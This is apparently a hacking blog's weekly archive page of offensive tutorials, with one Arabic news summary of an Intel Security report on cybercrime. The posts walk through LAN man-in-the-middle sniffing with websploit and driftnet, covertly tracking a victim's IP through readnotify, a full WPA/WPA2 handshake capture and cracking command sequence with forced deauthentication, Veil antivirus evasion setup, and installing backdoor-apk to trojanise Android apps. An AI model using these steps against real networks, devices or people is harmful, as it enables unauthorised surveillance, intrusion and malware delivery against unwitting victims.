Skip to main content

Posts

Showing posts from March 12, 2017

How to hack windows 8 and Webcam using kali linux

How to hack windows 8 and Webcam using kali linux

Link sniffing with Websploit and Dirftnet.

Link sniffing with Websploit and Dirftnet. Man In The Middle Attack The Middle Attak is used to capture all the images and links that is travelling across our Target network. Anybody who is connected to our network whatever images and links they see in their browser,we will capture and view them in real time.So in this article we will learn how you can spy on Lan network by sniffing images and links that our victim browses. We will use Driftnet and Websploit to perform this attack. So open your terminal and start websploit: root@abh :~# websploit         See all the exploits inside websploit.Below command displays all the exploits with short description. We will use network the middle attack.So type the following: wsf > use network/mitm Show option command displays the configurations to launch the attack.We need to set our network interface , sniffer and victim's ip address.   wsf:MITM > show options  

E-mail and IP Address Tracking

E-mail and IP Address Tracking Hello Readers...!!! through this post i am going to let you know about hot to track an Email and also get the IP Address of the Victim. also you can send self destruction mail  Here are the steps for Email Tracking: step 1: know what is your victim email id. For eg: victimid[@]gmail.com step 2 : Register an account here: http://www.readnotify.com step 3 : send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.  For eg: victimid[@]gmail.com.readnotify.com  step 4 : if victim opens the mail, his info will be tracked(IP address) and mailed to your account.

coWPAtty & Genpmk (Pre computed hashes): Cracking WiFi WPA WPA2

coWPAtty & Genpmk (Pre computed hashes) : Cracking WiFi WPA WPA2     Tutorial Command airmon-ng start wlan0 airodump-ng mon0 airodump-ng --channel 6 --write output --bssid 00:24:01:24:0A:F6 mon0 aireplay-ng --deauth 6 -a 00:24:01:24:0A:F6 -c 00:FA:BC:8F:1A mon0 airolib-ng crackwpa --import passwd /root/pass.txt airolib-ng crackwpa --import essid essid airolib-ng crackwpa --stats airolib-ng crackwpa --clean all airolib-ng crackwpa --batch airolib-ng crackwpa --verify all aircrack -r crackwpa output-01.cap cowpatty -s Denial_of_Service -r /root/output-01.cap -f /root/pass.txt genpmk -s Denial_of_Service -d /root/output-hash -f /root/pass.txt cowpatty -s Denial_of_Service -r /root/output-01.cap -d /root/output-hash  

privilege escalation using meterpreter

privilege escalation using meterpreter

مجرمو الإنترنت يتمتعون بمزايا كبرى

مجرمو الإنترنت يتمتعون بمزايا كبرى مقارنة بشركات حماية أمن المعلومات   خلُصت دراسة أجرتها شركة “إنتل سيكيوريتي“، وهي الذراع المتخصص في أمن المعلومات من عملاقة صناعة الرقائق الإلكترونية الأميركية إلى أن مجرمي الإنترنت لديهم ميزات أكبر مقارنة بتلك التي تمتلكها شركات حماية المعلومات. وكشفت “إنتل سكيوريتي”، بالتعاون مع مركز الدراسات الاستراتيجية والدولية CSIS، حديثًا عن تقريرها الجديد بعنوان Tilting the Playing Field: How Misaligned Incentives Work Against Cybersecurity، وهو تقرير عالمي واستطلاع شامل يكشف عن ثلاثة أشكال أساسية من الحوافز غير المتوافقة والفروقات بين شركات أمن المعلومات وبين مؤسسات الجريمة الإلكترونية. ويُسلط التقرير الضوء على الفرق بين هيكلية عمل شركات أمن المعلومات مقابل المرونة وحرية العمل التي تتمتع بها شركات الجرائم الإلكترونية، بالإضافة إلى تركيز التقرير على قضية وضع الاستراتيجيات الأمنية فقط من دون تنفيذها، والفرق بين رؤية كبار التنفيذيين للوضع الأمني في شركاتهم مقابل مايراه الموظفون التنفيذيون. كما يسلط التقرير الضوء على مجموعة من الطرق

Veil 3.0 released: antivirus evasion and evading detection

Veil 3.0 released: antivirus evasion and evading detection   The Veil-Framework is a collection of red team security tools that implement various attack methods focused on antivirus evasion and evading detection. Antivirus ‘solutions’ don’t often catch the bad guys, but they do often catch pen-testing during assignment. This tool came about as a way to execute existing shellcode in a way that could evade AV engines without rolling a new backdoor each time. Today, in International Security Conference 2017, the leader of Veil project – Christopher Truncer was released Veil 3.0 What’s new : You can get AntiVirus Evasion Reconstructed – Veil 3.0 paper here Installing apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ cd setup sudo ./setup.sh -c  Usage    

Hacking Android Stagefright Kali

  Hacking Android Stagefright Kali

meterpreter system commands

meterpreter system commands   expert metasploit penetration testing course  episode 21

backdoor-apk: adding a backdoor to any Android APK file

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only. Installing R3d-d3v!L@abh ~/Desktop $ git clone https://github.com/dana-at-cp/backdoor-apk.git R3d-d3v!L@abh ~/Desktop $ cd backdoor-apk/backdoor-apk/ R3d-d3v!L@abh ~/Desktop/backdoor-apk/backdoor-apk $ chmod +x *.sh R3d-d3v!L@abh ~/Desktop   /backdoor-apk/backdoor-apk $ ./backdoor-apk.sh Change log backdoor-apk v0.1.7 +**Improvements** +- Automatic generation of Metasploit resource script to handle selected payload (credit to John Troony for the suggestion) +**Bug Fixes** +- Fixed persistence hook breakage caused by upstream changes in Metasploit Usage: Video Tutorial